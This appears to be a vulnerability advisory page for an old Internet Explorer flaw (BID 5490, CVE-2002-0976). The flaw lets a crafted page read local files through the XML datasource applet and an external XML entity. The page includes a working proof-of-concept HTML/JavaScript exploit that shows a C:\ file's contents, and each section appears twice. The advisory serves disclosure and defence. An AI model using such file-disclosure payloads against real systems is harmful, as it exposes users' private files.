Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
BID:5490
Info
Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
| Bugtraq ID: | 5490 |
| Class: | Design Error |
| CVE: |
CVE-2002-0976 CVE-2002-0976 |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 17 2002 12:00AM |
| Updated: | Jan 25 2014 06:14AM |
| Credit: | Vulnerability discovery credited to Jelmer <[email protected]> |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 4.0.1 SP2 Microsoft Internet Explorer 4.0.1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.0 Microsoft Internet Explorer 4.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.
Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.
A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.
Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.
Exploit / POC
Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
The following exploit code was contributed by Jelmer <[email protected]> and will display the contents of the jelmer.txt file in the C:\ folder:
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
A demonstration may be viewed at http://www.xs4all.nl/~jkuperus/msieread.htm.
The following exploit code was contributed by Jelmer <[email protected]> and will display the contents of the jelmer.txt file in the C:\ folder:
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
A demonstration may be viewed at http://www.xs4all.nl/~jkuperus/msieread.htm.
Solution / Fix
Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer XML Datasource Applet File Disclosure Vulnerability
References:
References:
- XML Does It Your Way! Part III (Scott Clark)